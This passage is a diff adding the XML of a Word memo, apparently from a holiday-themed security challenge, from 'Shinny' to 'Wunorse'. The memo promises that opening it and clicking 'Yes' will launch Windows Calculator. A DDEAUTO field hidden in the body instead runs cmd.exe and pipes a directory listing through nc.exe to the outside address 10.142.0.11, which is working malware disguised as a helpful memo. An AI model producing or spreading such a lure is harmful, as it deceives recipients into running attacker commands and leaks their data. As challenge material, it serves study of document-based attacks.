+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>103505</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="0" cy="1371600"/>
+                <wp:effectExtent l="9525" t="9525" r="9525" b="9525"/>
+                <wp:wrapNone/>
+                <wp:docPr id="4" name="Line 8"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvCnPr>
+                        <a:cxnSpLocks noChangeShapeType="1"/>
+                      </wps:cNvCnPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm flipV="1">
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="0" cy="1371600"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="line">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln w="12700">
+                          <a:solidFill>
+                            <a:srgbClr val="FFFFFF"/>
+                          </a:solidFill>
+                          <a:round/>
+                          <a:headEnd/>
+                          <a:tailEnd/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:noFill/>
+                            </a14:hiddenFill>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:bodyPr/>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:line w14:anchorId="154CF63E" id="Line 8" o:spid="_x0000_s1026" style="position:absolute;flip:y;z-index:251655680;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page" from="-279pt,8.15pt" to="-279pt,116.15pt" o:gfxdata="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" strokecolor="white" strokeweight="1pt"/>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve">  </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> </w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText>DDEAUTO c:\\windows\\system32\\cmd.exe "/k dir | nc.exe 10.142.0.11 44665"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:instrText xml:space="preserve"> </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656704" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-800100</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>166370</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="7086600" cy="1638300"/>
+                <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                <wp:wrapNone/>
+                <wp:docPr id="3" name="Text Box 10"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="7086600" cy="1638300"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText"/>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                              <w:t>TO: Wunorse Openslae</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText"/>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                              <w:t>FROM: Shinny Upatree</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText"/>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="FF0000"/>
+                              </w:rPr>
+                              <w:t>Subject: Reminder for Calculator Access</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Text Box 10" o:spid="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:13.1pt;width:558pt;height:129pt;z-index:251656704;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText"/>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                        <w:t>TO: Wunorse Openslae</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText"/>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                        <w:t>FROM: Shinny Upatree</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText"/>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="FF0000"/>
+                        </w:rPr>
+                        <w:t>Subject: Reminder for Calculator Access</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="Times New Roman" w:hAnsi="Trebuchet MS" w:cs="Times New Roman"/>
+          <w:noProof/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251654656" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>-800100</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>466725</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="6781800" cy="3686175"/>
+                <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+                <wp:wrapNone/>
+                <wp:docPr id="2" name="Text Box 2"/>
+                <wp:cNvGraphicFramePr>
+                  <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
+                </wp:cNvGraphicFramePr>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1">
+                        <a:spLocks noChangeArrowheads="1"/>
+                      </wps:cNvSpPr>
+                      <wps:spPr bwMode="auto">
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="6781800" cy="3686175"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:noFill/>
+                        <a:ln>
+                          <a:noFill/>
+                        </a:ln>
+                        <a:extLst>
+                          <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
+                            <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
+                              <a:solidFill>
+                                <a:srgbClr val="FFFFFF"/>
+                              </a:solidFill>
+                            </a14:hiddenFill>
+                          </a:ext>
+                          <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
+                            <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
+                              <a:solidFill>
+                                <a:srgbClr val="000000"/>
+                              </a:solidFill>
+                              <a:miter lim="800000"/>
+                              <a:headEnd/>
+                              <a:tailEnd/>
+                            </a14:hiddenLine>
+                          </a:ext>
+                        </a:extLst>
+                      </wps:spPr>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                              <w:t>I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                              <w:t>Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                              <w:t>Please try not to delete this document as well.</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                              <w:t>Sincerely,</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="BodyText2"/>
+                              <w:spacing w:line="276" w:lineRule="auto"/>
+                              <w:jc w:val="left"/>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                            </w:pPr>
+                            <w:r>
+                              <w:rPr>
+                                <w:color w:val="89AA00"/>
+                                <w:sz w:val="32"/>
+                              </w:rPr>
+                              <w:t>Shinny</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t" anchorCtr="0" upright="1">
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelH relativeFrom="page">
+                  <wp14:pctWidth>0</wp14:pctWidth>
+                </wp14:sizeRelH>
+                <wp14:sizeRelV relativeFrom="page">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+                <v:stroke joinstyle="miter"/>
+                <v:path gradientshapeok="t" o:connecttype="rect"/>
+              </v:shapetype>
+              <v:shape id="Text Box 2" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;margin-left:-63pt;margin-top:36.75pt;width:534pt;height:290.25pt;z-index:251654656;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:page;mso-height-relative:page;v-text-anchor:top" o:gfxdata="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" filled="f" stroked="f">
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                        <w:t>I don't know how you do it Wunorse. I've restored your Windows Calculator shortcut at least a dozen times. Instead of creating it again, I've created a special document for you.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                        <w:t>Open this memo in Microsoft Word. Answer "Yes" to the dialogs, and it will start Windows Calculator for you automatically.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                        <w:t>Please try not to delete this document as well.</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                        <w:t>Sincerely,</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+                      <w:bookmarkEnd w:id="1"/>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyText2"/>
+                        <w:spacing w:line="276" w:lineRule="auto"/>
+                        <w:jc w:val="left"/>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                      </w:pPr>
+                      <w:r>
+                        <w:rPr>
+                          <w:color w:val="89AA00"/>
+                          <w:sz w:val="32"/>
+                        </w:rPr>
+                        <w:t>Shinny</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+    </w:p>
+    <w:sectPr>
+      <w:pgSz w:w="12240" w:h="15840"/>
+      <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:cols w:space="720"/>
+      <w:docGrid w:linePitch="360"/>
+    </w:sectPr>
+  </w:body>
+</w:document>
 </file>
 
 <file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
